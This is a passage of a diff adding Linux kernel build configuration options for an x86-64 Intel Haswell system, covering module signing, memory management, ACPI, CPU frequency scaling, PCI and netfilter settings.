+CONFIG_SCHED_AUTOGROUP=y
+# CONFIG_SYSFS_DEPRECATED is not set
+CONFIG_RELAY=y
+CONFIG_BLK_DEV_INITRD=y
+CONFIG_INITRAMFS_SOURCE=""
+CONFIG_RD_GZIP=y
+CONFIG_RD_BZIP2=y
+CONFIG_RD_LZMA=y
+CONFIG_RD_XZ=y
+CONFIG_RD_LZO=y
+CONFIG_RD_LZ4=y
+CONFIG_CC_OPTIMIZE_FOR_PERFORMANCE=y
+# CONFIG_CC_OPTIMIZE_FOR_SIZE is not set
+CONFIG_SYSCTL=y
+CONFIG_ANON_INODES=y
+CONFIG_HAVE_UID16=y
+CONFIG_SYSCTL_EXCEPTION_TRACE=y
+CONFIG_HAVE_PCSPKR_PLATFORM=y
+CONFIG_BPF=y
+CONFIG_EXPERT=y
+CONFIG_UID16=y
+CONFIG_MULTIUSER=y
+CONFIG_SGETMASK_SYSCALL=y
+CONFIG_SYSFS_SYSCALL=y
+# CONFIG_SYSCTL_SYSCALL is not set
+CONFIG_KALLSYMS=y
+# CONFIG_KALLSYMS_ALL is not set
+CONFIG_KALLSYMS_ABSOLUTE_PERCPU=y
+CONFIG_KALLSYMS_BASE_RELATIVE=y
+CONFIG_PRINTK=y
+CONFIG_PRINTK_NMI=y
+CONFIG_BUG=y
+CONFIG_ELF_CORE=y
+CONFIG_PCSPKR_PLATFORM=y
+CONFIG_BASE_FULL=y
+CONFIG_FUTEX=y
+CONFIG_EPOLL=y
+CONFIG_SIGNALFD=y
+CONFIG_TIMERFD=y
+CONFIG_EVENTFD=y
+CONFIG_BPF_SYSCALL=y
+CONFIG_SHMEM=y
+CONFIG_AIO=y
+CONFIG_ADVISE_SYSCALLS=y
+# CONFIG_PCI_QUIRKS is not set
+CONFIG_MEMBARRIER=y
+# CONFIG_EMBEDDED is not set
+CONFIG_HAVE_PERF_EVENTS=y
+
+#
+# Kernel Performance Events And Counters
+#
+CONFIG_PERF_EVENTS=y
+# CONFIG_DEBUG_PERF_USE_VMALLOC is not set
+CONFIG_VM_EVENT_COUNTERS=y
+CONFIG_SLUB_DEBUG=y
+# CONFIG_COMPAT_BRK is not set
+# CONFIG_SLAB is not set
+CONFIG_SLUB=y
+# CONFIG_SLOB is not set
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLUB_CPU_PARTIAL=y
+CONFIG_SYSTEM_DATA_VERIFICATION=y
+CONFIG_PROFILING=y
+# CONFIG_OPROFILE is not set
+CONFIG_HAVE_OPROFILE=y
+CONFIG_OPROFILE_NMI_TIMER=y
+CONFIG_KPROBES=y
+CONFIG_JUMP_LABEL=y
+# CONFIG_STATIC_KEYS_SELFTEST is not set
+CONFIG_OPTPROBES=y
+# CONFIG_UPROBES is not set
+# CONFIG_HAVE_64BIT_ALIGNED_ACCESS is not set
+CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS=y
+CONFIG_ARCH_USE_BUILTIN_BSWAP=y
+CONFIG_USER_RETURN_NOTIFIER=y
+CONFIG_HAVE_IOREMAP_PROT=y
+CONFIG_HAVE_KPROBES=y
+CONFIG_HAVE_KRETPROBES=y
+CONFIG_HAVE_OPTPROBES=y
+CONFIG_HAVE_KPROBES_ON_FTRACE=y
+CONFIG_HAVE_NMI=y
+CONFIG_HAVE_ARCH_TRACEHOOK=y
+CONFIG_HAVE_DMA_CONTIGUOUS=y
+CONFIG_GENERIC_SMP_IDLE_THREAD=y
+CONFIG_HAVE_REGS_AND_STACK_ACCESS_API=y
+CONFIG_HAVE_CLK=y
+CONFIG_HAVE_DMA_API_DEBUG=y
+CONFIG_HAVE_HW_BREAKPOINT=y
+CONFIG_HAVE_MIXED_BREAKPOINTS_REGS=y
+CONFIG_HAVE_USER_RETURN_NOTIFIER=y
+CONFIG_HAVE_PERF_EVENTS_NMI=y
+CONFIG_HAVE_PERF_REGS=y
+CONFIG_HAVE_PERF_USER_STACK_DUMP=y
+CONFIG_HAVE_ARCH_JUMP_LABEL=y
+CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG=y
+CONFIG_HAVE_ALIGNED_STRUCT_PAGE=y
+CONFIG_HAVE_CMPXCHG_LOCAL=y
+CONFIG_HAVE_CMPXCHG_DOUBLE=y
+CONFIG_ARCH_WANT_COMPAT_IPC_PARSE_VERSION=y
+CONFIG_ARCH_WANT_OLD_COMPAT_IPC=y
+CONFIG_HAVE_ARCH_SECCOMP_FILTER=y
+CONFIG_SECCOMP_FILTER=y
+CONFIG_HAVE_GCC_PLUGINS=y
+CONFIG_GCC_PLUGINS=y
+# CONFIG_GCC_PLUGIN_CYC_COMPLEXITY is not set
+CONFIG_GCC_PLUGIN_LATENT_ENTROPY=y
+CONFIG_HAVE_CC_STACKPROTECTOR=y
+CONFIG_CC_STACKPROTECTOR=y
+# CONFIG_CC_STACKPROTECTOR_NONE is not set
+# CONFIG_CC_STACKPROTECTOR_REGULAR is not set
+CONFIG_CC_STACKPROTECTOR_STRONG=y
+CONFIG_HAVE_ARCH_WITHIN_STACK_FRAMES=y
+CONFIG_HAVE_CONTEXT_TRACKING=y
+CONFIG_HAVE_VIRT_CPU_ACCOUNTING_GEN=y
+CONFIG_HAVE_IRQ_TIME_ACCOUNTING=y
+CONFIG_HAVE_ARCH_TRANSPARENT_HUGEPAGE=y
+CONFIG_HAVE_ARCH_HUGE_VMAP=y
+CONFIG_HAVE_ARCH_SOFT_DIRTY=y
+CONFIG_MODULES_USE_ELF_RELA=y
+CONFIG_HAVE_IRQ_EXIT_ON_IRQ_STACK=y
+CONFIG_ARCH_HAS_ELF_RANDOMIZE=y
+CONFIG_HAVE_ARCH_MMAP_RND_BITS=y
+CONFIG_HAVE_EXIT_THREAD=y
+CONFIG_ARCH_MMAP_RND_BITS=27
+CONFIG_HAVE_ARCH_MMAP_RND_COMPAT_BITS=y
+CONFIG_ARCH_MMAP_RND_COMPAT_BITS=8
+CONFIG_HAVE_COPY_THREAD_TLS=y
+CONFIG_HAVE_STACK_VALIDATION=y
+# CONFIG_HAVE_ARCH_HASH is not set
+CONFIG_ISA_BUS_API=y
+CONFIG_OLD_SIGSUSPEND3=y
+CONFIG_COMPAT_OLD_SIGACTION=y
+# CONFIG_CPU_NO_EFFICIENT_FFS is not set
+CONFIG_HAVE_ARCH_VMAP_STACK=y
+
+#
+# GCOV-based kernel profiling
+#
+CONFIG_ARCH_HAS_GCOV_PROFILE_ALL=y
+# CONFIG_HAVE_GENERIC_DMA_COHERENT is not set
+CONFIG_SLABINFO=y
+CONFIG_RT_MUTEXES=y
+CONFIG_BASE_SMALL=0
+CONFIG_MODULES=y
+# CONFIG_MODULE_FORCE_LOAD is not set
+CONFIG_MODULE_UNLOAD=y
+CONFIG_MODULE_FORCE_UNLOAD=y
+CONFIG_MODVERSIONS=y
+CONFIG_MODULE_SRCVERSION_ALL=y
+CONFIG_MODULE_SIG=y
+CONFIG_MODULE_SIG_FORCE=y
+CONFIG_MODULE_SIG_ALL=y
+# CONFIG_MODULE_SIG_SHA1 is not set
+# CONFIG_MODULE_SIG_SHA224 is not set
+CONFIG_MODULE_SIG_SHA256=y
+# CONFIG_MODULE_SIG_SHA384 is not set
+# CONFIG_MODULE_SIG_SHA512 is not set
+CONFIG_MODULE_SIG_HASH="sha256"
+CONFIG_MODULE_COMPRESS=y
+CONFIG_MODULE_COMPRESS_GZIP=y
+# CONFIG_MODULE_COMPRESS_XZ is not set
+CONFIG_TRIM_UNUSED_KSYMS=y
+CONFIG_MODULES_TREE_LOOKUP=y
+CONFIG_BLOCK=y
+CONFIG_BLK_DEV_BSG=y
+CONFIG_BLK_DEV_BSGLIB=y
+CONFIG_BLK_DEV_INTEGRITY=y
+CONFIG_BLK_DEV_THROTTLING=y
+# CONFIG_BLK_CMDLINE_PARSER is not set
+
+#
+# Partition Types
+#
+CONFIG_PARTITION_ADVANCED=y
+# CONFIG_ACORN_PARTITION is not set
+# CONFIG_AIX_PARTITION is not set
+# CONFIG_OSF_PARTITION is not set
+# CONFIG_AMIGA_PARTITION is not set
+# CONFIG_ATARI_PARTITION is not set
+# CONFIG_MAC_PARTITION is not set
+CONFIG_MSDOS_PARTITION=y
+CONFIG_BSD_DISKLABEL=y
+CONFIG_MINIX_SUBPARTITION=y
+# CONFIG_SOLARIS_X86_PARTITION is not set
+# CONFIG_UNIXWARE_DISKLABEL is not set
+# CONFIG_LDM_PARTITION is not set
+# CONFIG_SGI_PARTITION is not set
+# CONFIG_ULTRIX_PARTITION is not set
+# CONFIG_SUN_PARTITION is not set
+# CONFIG_KARMA_PARTITION is not set
+CONFIG_EFI_PARTITION=y
+# CONFIG_SYSV68_PARTITION is not set
+# CONFIG_CMDLINE_PARTITION is not set
+CONFIG_BLOCK_COMPAT=y
+CONFIG_BLK_MQ_PCI=y
+
+#
+# IO Schedulers
+#
+CONFIG_IOSCHED_NOOP=y
+CONFIG_IOSCHED_DEADLINE=y
+CONFIG_IOSCHED_CFQ=y
+CONFIG_CFQ_GROUP_IOSCHED=y
+# CONFIG_DEFAULT_DEADLINE is not set
+CONFIG_DEFAULT_CFQ=y
+# CONFIG_DEFAULT_NOOP is not set
+CONFIG_DEFAULT_IOSCHED="cfq"
+CONFIG_PREEMPT_NOTIFIERS=y
+CONFIG_ASN1=y
+CONFIG_INLINE_SPIN_UNLOCK_IRQ=y
+CONFIG_INLINE_READ_UNLOCK=y
+CONFIG_INLINE_READ_UNLOCK_IRQ=y
+CONFIG_INLINE_WRITE_UNLOCK=y
+CONFIG_INLINE_WRITE_UNLOCK_IRQ=y
+CONFIG_ARCH_SUPPORTS_ATOMIC_RMW=y
+CONFIG_MUTEX_SPIN_ON_OWNER=y
+CONFIG_RWSEM_SPIN_ON_OWNER=y
+CONFIG_LOCK_SPIN_ON_OWNER=y
+CONFIG_ARCH_USE_QUEUED_SPINLOCKS=y
+CONFIG_QUEUED_SPINLOCKS=y
+CONFIG_ARCH_USE_QUEUED_RWLOCKS=y
+CONFIG_QUEUED_RWLOCKS=y
+# CONFIG_FREEZER is not set
+
+#
+# Processor type and features
+#
+CONFIG_ZONE_DMA=y
+CONFIG_SMP=y
+CONFIG_X86_FEATURE_NAMES=y
+CONFIG_X86_FAST_FEATURE_TESTS=y
+CONFIG_X86_X2APIC=y
+CONFIG_X86_MPPARSE=y
+# CONFIG_GOLDFISH is not set
+# CONFIG_X86_EXTENDED_PLATFORM is not set
+CONFIG_X86_INTEL_LPSS=y
+# CONFIG_X86_AMD_PLATFORM_DEVICE is not set
+CONFIG_IOSF_MBI=y
+CONFIG_X86_SUPPORTS_MEMORY_FAILURE=y
+CONFIG_SCHED_OMIT_FRAME_POINTER=y
+CONFIG_HYPERVISOR_GUEST=y
+CONFIG_PARAVIRT=y
+# CONFIG_PARAVIRT_DEBUG is not set
+CONFIG_PARAVIRT_SPINLOCKS=y
+# CONFIG_XEN is not set
+CONFIG_KVM_GUEST=y
+CONFIG_PARAVIRT_TIME_ACCOUNTING=y
+CONFIG_PARAVIRT_CLOCK=y
+CONFIG_NO_BOOTMEM=y
+# CONFIG_MK8 is not set
+# CONFIG_MK8SSE3 is not set
+# CONFIG_MK10 is not set
+# CONFIG_MBARCELONA is not set
+# CONFIG_MBOBCAT is not set
+# CONFIG_MJAGUAR is not set
+# CONFIG_MBULLDOZER is not set
+# CONFIG_MPILEDRIVER is not set
+# CONFIG_MSTEAMROLLER is not set
+# CONFIG_MEXCAVATOR is not set
+# CONFIG_MZEN is not set
+# CONFIG_MPSC is not set
+# CONFIG_MATOM is not set
+# CONFIG_MCORE2 is not set
+# CONFIG_MNEHALEM is not set
+# CONFIG_MWESTMERE is not set
+# CONFIG_MSILVERMONT is not set
+# CONFIG_MSANDYBRIDGE is not set
+# CONFIG_MIVYBRIDGE is not set
+CONFIG_MHASWELL=y
+# CONFIG_MBROADWELL is not set
+# CONFIG_MSKYLAKE is not set
+# CONFIG_GENERIC_CPU is not set
+# CONFIG_MNATIVE is not set
+CONFIG_X86_INTERNODE_CACHE_SHIFT=6
+CONFIG_X86_L1_CACHE_SHIFT=6
+CONFIG_X86_INTEL_USERCOPY=y
+CONFIG_X86_USE_PPRO_CHECKSUM=y
+CONFIG_X86_P6_NOP=y
+CONFIG_X86_TSC=y
+CONFIG_X86_CMPXCHG64=y
+CONFIG_X86_CMOV=y
+CONFIG_X86_MINIMUM_CPU_FAMILY=64
+CONFIG_X86_DEBUGCTLMSR=y
+CONFIG_PROCESSOR_SELECT=y
+CONFIG_CPU_SUP_INTEL=y
+# CONFIG_CPU_SUP_AMD is not set
+# CONFIG_CPU_SUP_CENTAUR is not set
+CONFIG_HPET_TIMER=y
+CONFIG_HPET_EMULATE_RTC=y
+CONFIG_DMI=y
+CONFIG_CALGARY_IOMMU=y
+CONFIG_CALGARY_IOMMU_ENABLED_BY_DEFAULT=y
+CONFIG_SWIOTLB=y
+CONFIG_IOMMU_HELPER=y
+# CONFIG_MAXSMP is not set
+CONFIG_NR_CPUS=4
+CONFIG_SCHED_SMT=y
+CONFIG_SCHED_MC=y
+# CONFIG_PREEMPT_NONE is not set
+CONFIG_PREEMPT_VOLUNTARY=y
+# CONFIG_PREEMPT is not set
+CONFIG_X86_LOCAL_APIC=y
+CONFIG_X86_IO_APIC=y
+CONFIG_X86_REROUTE_FOR_BROKEN_BOOT_IRQS=y
+CONFIG_X86_MCE=y
+CONFIG_X86_MCE_INTEL=y
+# CONFIG_X86_MCE_AMD is not set
+CONFIG_X86_MCE_THRESHOLD=y
+# CONFIG_X86_MCE_INJECT is not set
+CONFIG_X86_THERMAL_VECTOR=y
+
+#
+# Performance monitoring
+#
+CONFIG_PERF_EVENTS_INTEL_UNCORE=y
+CONFIG_PERF_EVENTS_INTEL_RAPL=y
+CONFIG_PERF_EVENTS_INTEL_CSTATE=y
+# CONFIG_VM86 is not set
+CONFIG_X86_VSYSCALL_EMULATION=y
+# CONFIG_I8K is not set
+# CONFIG_MICROCODE is not set
+CONFIG_X86_MSR=y
+CONFIG_X86_CPUID=y
+CONFIG_ARCH_PHYS_ADDR_T_64BIT=y
+CONFIG_ARCH_DMA_ADDR_T_64BIT=y
+CONFIG_X86_DIRECT_GBPAGES=y
+CONFIG_NUMA=y
+# CONFIG_AMD_NUMA is not set
+CONFIG_X86_64_ACPI_NUMA=y
+CONFIG_NODES_SPAN_OTHER_NODES=y
+# CONFIG_NUMA_EMU is not set
+CONFIG_NODES_SHIFT=6
+CONFIG_ARCH_SPARSEMEM_ENABLE=y
+CONFIG_ARCH_SPARSEMEM_DEFAULT=y
+CONFIG_ARCH_SELECT_MEMORY_MODEL=y
+CONFIG_ARCH_MEMORY_PROBE=y
+CONFIG_ILLEGAL_POINTER_VALUE=0xdead000000000000
+CONFIG_SELECT_MEMORY_MODEL=y
+CONFIG_SPARSEMEM_MANUAL=y
+CONFIG_SPARSEMEM=y
+CONFIG_NEED_MULTIPLE_NODES=y
+CONFIG_HAVE_MEMORY_PRESENT=y
+CONFIG_SPARSEMEM_EXTREME=y
+CONFIG_SPARSEMEM_VMEMMAP_ENABLE=y
+CONFIG_SPARSEMEM_ALLOC_MEM_MAP_TOGETHER=y
+CONFIG_SPARSEMEM_VMEMMAP=y
+CONFIG_HAVE_MEMBLOCK=y
+CONFIG_HAVE_MEMBLOCK_NODE_MAP=y
+CONFIG_ARCH_DISCARD_MEMBLOCK=y
+CONFIG_MEMORY_ISOLATION=y
+# CONFIG_MOVABLE_NODE is not set
+CONFIG_HAVE_BOOTMEM_INFO_NODE=y
+CONFIG_MEMORY_HOTPLUG=y
+CONFIG_MEMORY_HOTPLUG_SPARSE=y
+CONFIG_MEMORY_HOTPLUG_DEFAULT_ONLINE=y
+CONFIG_MEMORY_HOTREMOVE=y
+CONFIG_SPLIT_PTLOCK_CPUS=4
+CONFIG_ARCH_ENABLE_SPLIT_PMD_PTLOCK=y
+CONFIG_MEMORY_BALLOON=y
+CONFIG_BALLOON_COMPACTION=y
+CONFIG_COMPACTION=y
+CONFIG_MIGRATION=y
+CONFIG_PHYS_ADDR_T_64BIT=y
+CONFIG_BOUNCE=y
+CONFIG_VIRT_TO_BUS=y
+CONFIG_MMU_NOTIFIER=y
+CONFIG_KSM=y
+CONFIG_DEFAULT_MMAP_MIN_ADDR=65536
+CONFIG_ARCH_SUPPORTS_MEMORY_FAILURE=y
+CONFIG_MEMORY_FAILURE=y
+CONFIG_TRANSPARENT_HUGEPAGE=y
+CONFIG_TRANSPARENT_HUGEPAGE_ALWAYS=y
+# CONFIG_TRANSPARENT_HUGEPAGE_MADVISE is not set
+CONFIG_TRANSPARENT_HUGE_PAGECACHE=y
+CONFIG_CLEANCACHE=y
+CONFIG_FRONTSWAP=y
+# CONFIG_CMA is not set
+CONFIG_ZSWAP=y
+CONFIG_ZPOOL=y
+CONFIG_ZBUD=y
+CONFIG_Z3FOLD=y
+CONFIG_ZSMALLOC=y
+# CONFIG_PGTABLE_MAPPING is not set
+CONFIG_GENERIC_EARLY_IOREMAP=y
+CONFIG_ARCH_SUPPORTS_DEFERRED_STRUCT_PAGE_INIT=y
+# CONFIG_DEFERRED_STRUCT_PAGE_INIT is not set
+# CONFIG_IDLE_PAGE_TRACKING is not set
+CONFIG_ZONE_DEVICE=y
+CONFIG_FRAME_VECTOR=y
+CONFIG_ARCH_USES_HIGH_VMA_FLAGS=y
+CONFIG_ARCH_HAS_PKEYS=y
+# CONFIG_X86_PMEM_LEGACY is not set
+CONFIG_X86_CHECK_BIOS_CORRUPTION=y
+CONFIG_X86_BOOTPARAM_MEMORY_CORRUPTION_CHECK=y
+CONFIG_X86_RESERVE_LOW=64
+CONFIG_MTRR=y
+CONFIG_MTRR_SANITIZER=y
+CONFIG_MTRR_SANITIZER_ENABLE_DEFAULT=0
+CONFIG_MTRR_SANITIZER_SPARE_REG_NR_DEFAULT=1
+CONFIG_X86_PAT=y
+CONFIG_ARCH_USES_PG_UNCACHED=y
+CONFIG_ARCH_RANDOM=y
+CONFIG_X86_SMAP=y
+CONFIG_X86_INTEL_MPX=y
+CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS=y
+CONFIG_EFI=y
+CONFIG_EFI_STUB=y
+CONFIG_EFI_MIXED=y
+CONFIG_SECCOMP=y
+# CONFIG_HZ_100 is not set
+# CONFIG_HZ_250 is not set
+CONFIG_HZ_300=y
+# CONFIG_HZ_1000 is not set
+CONFIG_HZ=300
+CONFIG_SCHED_HRTICK=y
+# CONFIG_KEXEC_FILE is not set
+CONFIG_CRASH_DUMP=y
+CONFIG_PHYSICAL_START=0x1000000
+CONFIG_RELOCATABLE=y
+CONFIG_PHYSICAL_ALIGN=0x1000000
+CONFIG_HOTPLUG_CPU=y
+# CONFIG_BOOTPARAM_HOTPLUG_CPU0 is not set
+# CONFIG_DEBUG_HOTPLUG_CPU0 is not set
+CONFIG_LEGACY_VSYSCALL_EMULATE=y
+# CONFIG_LEGACY_VSYSCALL_NONE is not set
+# CONFIG_CMDLINE_BOOL is not set
+# CONFIG_MODIFY_LDT_SYSCALL is not set
+# CONFIG_DEFAULT_MODIFY_LDT_SYSCALL is not set
+CONFIG_HAVE_LIVEPATCH=y
+CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y
+CONFIG_ARCH_ENABLE_MEMORY_HOTREMOVE=y
+CONFIG_USE_PERCPU_NUMA_NODE_ID=y
+
+#
+# Power management and ACPI options
+#
+# CONFIG_SUSPEND is not set
+CONFIG_PM=y
+# CONFIG_PM_DEBUG is not set
+CONFIG_PM_OPP=y
+CONFIG_PM_CLK=y
+# CONFIG_WQ_POWER_EFFICIENT_DEFAULT is not set
+CONFIG_ACPI=y
+CONFIG_ACPI_LEGACY_TABLES_LOOKUP=y
+CONFIG_ARCH_MIGHT_HAVE_ACPI_PDC=y
+CONFIG_ACPI_SYSTEM_POWER_STATES_SUPPORT=y
+# CONFIG_ACPI_DEBUGGER is not set
+# CONFIG_ACPI_PROCFS_POWER is not set
+# CONFIG_ACPI_REV_OVERRIDE_POSSIBLE is not set
+CONFIG_ACPI_EC_DEBUGFS=y
+CONFIG_ACPI_AC=y
+CONFIG_ACPI_BATTERY=y
+CONFIG_ACPI_BUTTON=y
+CONFIG_ACPI_VIDEO=y
+CONFIG_ACPI_FAN=y
+# CONFIG_ACPI_DOCK is not set
+CONFIG_ACPI_CPU_FREQ_PSS=y
+CONFIG_ACPI_PROCESSOR_CSTATE=y
+CONFIG_ACPI_PROCESSOR_IDLE=y
+CONFIG_ACPI_PROCESSOR=y
+CONFIG_ACPI_HOTPLUG_CPU=y
+CONFIG_ACPI_PROCESSOR_AGGREGATOR=y
+CONFIG_ACPI_THERMAL=y
+CONFIG_ACPI_NUMA=y
+# CONFIG_ACPI_CUSTOM_DSDT is not set
+CONFIG_ARCH_HAS_ACPI_TABLE_UPGRADE=y
+CONFIG_ACPI_TABLE_UPGRADE=y
+# CONFIG_ACPI_DEBUG is not set
+CONFIG_ACPI_PCI_SLOT=y
+CONFIG_X86_PM_TIMER=y
+CONFIG_ACPI_CONTAINER=y
+CONFIG_ACPI_HOTPLUG_MEMORY=y
+CONFIG_ACPI_HOTPLUG_IOAPIC=y
+CONFIG_ACPI_SBS=y
+CONFIG_ACPI_HED=y
+CONFIG_ACPI_BGRT=y
+# CONFIG_ACPI_REDUCED_HARDWARE_ONLY is not set
+# CONFIG_ACPI_NFIT is not set
+CONFIG_HAVE_ACPI_APEI=y
+CONFIG_HAVE_ACPI_APEI_NMI=y
+CONFIG_ACPI_APEI=y
+CONFIG_ACPI_APEI_GHES=y
+CONFIG_ACPI_APEI_PCIEAER=y
+# CONFIG_ACPI_APEI_MEMORY_FAILURE is not set
+# CONFIG_ACPI_APEI_ERST_DEBUG is not set
+CONFIG_DPTF_POWER=y
+# CONFIG_ACPI_EXTLOG is not set
+CONFIG_PMIC_OPREGION=y
+CONFIG_ACPI_CONFIGFS=y
+CONFIG_SFI=y
+
+#
+# CPU Frequency scaling
+#
+CONFIG_CPU_FREQ=y
+CONFIG_CPU_FREQ_GOV_ATTR_SET=y
+CONFIG_CPU_FREQ_GOV_COMMON=y
+# CONFIG_CPU_FREQ_STAT is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_POWERSAVE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set
+CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND=y
+# CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE is not set
+# CONFIG_CPU_FREQ_DEFAULT_GOV_SCHEDUTIL is not set
+CONFIG_CPU_FREQ_GOV_PERFORMANCE=y
+CONFIG_CPU_FREQ_GOV_POWERSAVE=y
+CONFIG_CPU_FREQ_GOV_USERSPACE=y
+CONFIG_CPU_FREQ_GOV_ONDEMAND=y
+CONFIG_CPU_FREQ_GOV_CONSERVATIVE=y
+CONFIG_CPU_FREQ_GOV_SCHEDUTIL=y
+
+#
+# CPU frequency scaling drivers
+#
+CONFIG_CPUFREQ_DT=y
+CONFIG_CPUFREQ_DT_PLATDEV=y
+CONFIG_X86_INTEL_PSTATE=y
+CONFIG_X86_PCC_CPUFREQ=y
+CONFIG_X86_ACPI_CPUFREQ=y
+# CONFIG_X86_POWERNOW_K8 is not set
+# CONFIG_X86_SPEEDSTEP_CENTRINO is not set
+# CONFIG_X86_P4_CLOCKMOD is not set
+
+#
+# shared options
+#
+# CONFIG_X86_SPEEDSTEP_LIB is not set
+
+#
+# CPU Idle
+#
+CONFIG_CPU_IDLE=y
+CONFIG_CPU_IDLE_GOV_LADDER=y
+CONFIG_CPU_IDLE_GOV_MENU=y
+# CONFIG_ARCH_NEEDS_CPU_IDLE_COUPLED is not set
+CONFIG_INTEL_IDLE=y
+
+#
+# Memory power savings
+#
+CONFIG_I7300_IDLE_IOAT_CHANNEL=y
+CONFIG_I7300_IDLE=y
+
+#
+# Bus options (PCI etc.)
+#
+CONFIG_PCI=y
+CONFIG_PCI_DIRECT=y
+CONFIG_PCI_MMCONFIG=y
+CONFIG_PCI_DOMAINS=y
+# CONFIG_PCI_CNB20LE_QUIRK is not set
+CONFIG_PCIEPORTBUS=y
+CONFIG_PCIEAER=y
+CONFIG_PCIE_ECRC=y
+# CONFIG_PCIEAER_INJECT is not set
+CONFIG_PCIEASPM=y
+# CONFIG_PCIEASPM_DEBUG is not set
+CONFIG_PCIEASPM_DEFAULT=y
+# CONFIG_PCIEASPM_POWERSAVE is not set
+# CONFIG_PCIEASPM_PERFORMANCE is not set
+CONFIG_PCIE_PME=y
+CONFIG_PCIE_DPC=y
+CONFIG_PCIE_PTM=y
+CONFIG_PCI_BUS_ADDR_T_64BIT=y
+CONFIG_PCI_MSI=y
+CONFIG_PCI_MSI_IRQ_DOMAIN=y
+# CONFIG_PCI_DEBUG is not set
+CONFIG_PCI_REALLOC_ENABLE_AUTO=y
+# CONFIG_PCI_STUB is not set
+CONFIG_HT_IRQ=y
+CONFIG_PCI_ATS=y
+CONFIG_PCI_IOV=y
+CONFIG_PCI_PRI=y
+CONFIG_PCI_PASID=y
+CONFIG_PCI_LABEL=y
+# CONFIG_HOTPLUG_PCI is not set
+
+#
+# PCI host controller drivers
+#
+CONFIG_PCIE_DW_PLAT=y
+CONFIG_PCIE_DW=y
+# CONFIG_VMD is not set
+CONFIG_ISA_BUS=y
+CONFIG_ISA_DMA_API=y
+# CONFIG_PCCARD is not set
+# CONFIG_RAPIDIO is not set
+# CONFIG_X86_SYSFB is not set
+
+#
+# Executable file formats / Emulations
+#
+CONFIG_BINFMT_ELF=y
+CONFIG_COMPAT_BINFMT_ELF=y
+CONFIG_ELFCORE=y
+CONFIG_CORE_DUMP_DEFAULT_ELF_HEADERS=y
+CONFIG_BINFMT_SCRIPT=y
+# CONFIG_HAVE_AOUT is not set
+CONFIG_BINFMT_MISC=y
+CONFIG_COREDUMP=y
+CONFIG_IA32_EMULATION=y
+CONFIG_IA32_AOUT=y
+CONFIG_X86_X32=y
+CONFIG_COMPAT=y
+CONFIG_COMPAT_FOR_U64_ALIGNMENT=y
+CONFIG_SYSVIPC_COMPAT=y
+CONFIG_KEYS_COMPAT=y
+CONFIG_X86_DEV_DMA_OPS=y
+CONFIG_PMC_ATOM=y
+CONFIG_NET=y
+CONFIG_COMPAT_NETLINK_MESSAGES=y
+CONFIG_NET_INGRESS=y
+
+#
+# Networking options
+#
+CONFIG_PACKET=y
+CONFIG_PACKET_DIAG=y
+CONFIG_UNIX=y
+CONFIG_UNIX_DIAG=y
+CONFIG_XFRM=y
+CONFIG_XFRM_ALGO=y
+CONFIG_XFRM_USER=y
+CONFIG_XFRM_SUB_POLICY=y
+# CONFIG_XFRM_MIGRATE is not set
+CONFIG_XFRM_STATISTICS=y
+CONFIG_XFRM_IPCOMP=y
+CONFIG_NET_KEY=y
+# CONFIG_NET_KEY_MIGRATE is not set
+CONFIG_INET=y
+CONFIG_IP_MULTICAST=y
+# CONFIG_IP_ADVANCED_ROUTER is not set
+CONFIG_IP_ROUTE_CLASSID=y
+# CONFIG_IP_PNP is not set
+CONFIG_NET_IPIP=y
+CONFIG_NET_IPGRE_DEMUX=y
+CONFIG_NET_IP_TUNNEL=y
+CONFIG_NET_IPGRE=y
+# CONFIG_NET_IPGRE_BROADCAST is not set
+# CONFIG_IP_MROUTE is not set
+CONFIG_SYN_COOKIES=y
+CONFIG_NET_IPVTI=y
+CONFIG_NET_UDP_TUNNEL=y
+CONFIG_NET_FOU=y
+CONFIG_NET_FOU_IP_TUNNELS=y
+CONFIG_INET_AH=y
+CONFIG_INET_ESP=y
+CONFIG_INET_IPCOMP=y
+CONFIG_INET_XFRM_TUNNEL=y
+CONFIG_INET_TUNNEL=y
+CONFIG_INET_XFRM_MODE_TRANSPORT=y
+CONFIG_INET_XFRM_MODE_TUNNEL=y
+CONFIG_INET_XFRM_MODE_BEET=y
+CONFIG_INET_DIAG=y
+CONFIG_INET_TCP_DIAG=y
+CONFIG_INET_UDP_DIAG=y
+CONFIG_INET_DIAG_DESTROY=y
+# CONFIG_TCP_CONG_ADVANCED is not set
+CONFIG_TCP_CONG_CUBIC=y
+CONFIG_DEFAULT_TCP_CONG="cubic"
+CONFIG_TCP_MD5SIG=y
+# CONFIG_IPV6 is not set
+# CONFIG_NETLABEL is not set
+CONFIG_NETWORK_SECMARK=y
+CONFIG_NET_PTP_CLASSIFY=y
+CONFIG_NETWORK_PHY_TIMESTAMPING=y
+CONFIG_NETFILTER=y
+# CONFIG_NETFILTER_DEBUG is not set
+CONFIG_NETFILTER_ADVANCED=y
+CONFIG_BRIDGE_NETFILTER=y
+
+#
+# Core Netfilter Configuration
+#
+CONFIG_NETFILTER_INGRESS=y
+CONFIG_NETFILTER_NETLINK=y
+CONFIG_NETFILTER_NETLINK_ACCT=y
+CONFIG_NETFILTER_NETLINK_QUEUE=y
+CONFIG_NETFILTER_NETLINK_LOG=y
+CONFIG_NF_CONNTRACK=y
+CONFIG_NF_LOG_COMMON=y
+CONFIG_NF_CONNTRACK_MARK=y
+CONFIG_NF_CONNTRACK_SECMARK=y
+CONFIG_NF_CONNTRACK_ZONES=y
+CONFIG_NF_CONNTRACK_PROCFS=y
+CONFIG_NF_CONNTRACK_EVENTS=y
+CONFIG_NF_CONNTRACK_TIMEOUT=y
+CONFIG_NF_CONNTRACK_TIMESTAMP=y
+CONFIG_NF_CONNTRACK_LABELS=y
+CONFIG_NF_CT_PROTO_DCCP=y
+CONFIG_NF_CT_PROTO_GRE=y
+CONFIG_NF_CT_PROTO_SCTP=y
+CONFIG_NF_CT_PROTO_UDPLITE=y
+CONFIG_NF_CONNTRACK_AMANDA=y
+CONFIG_NF_CONNTRACK_FTP=y
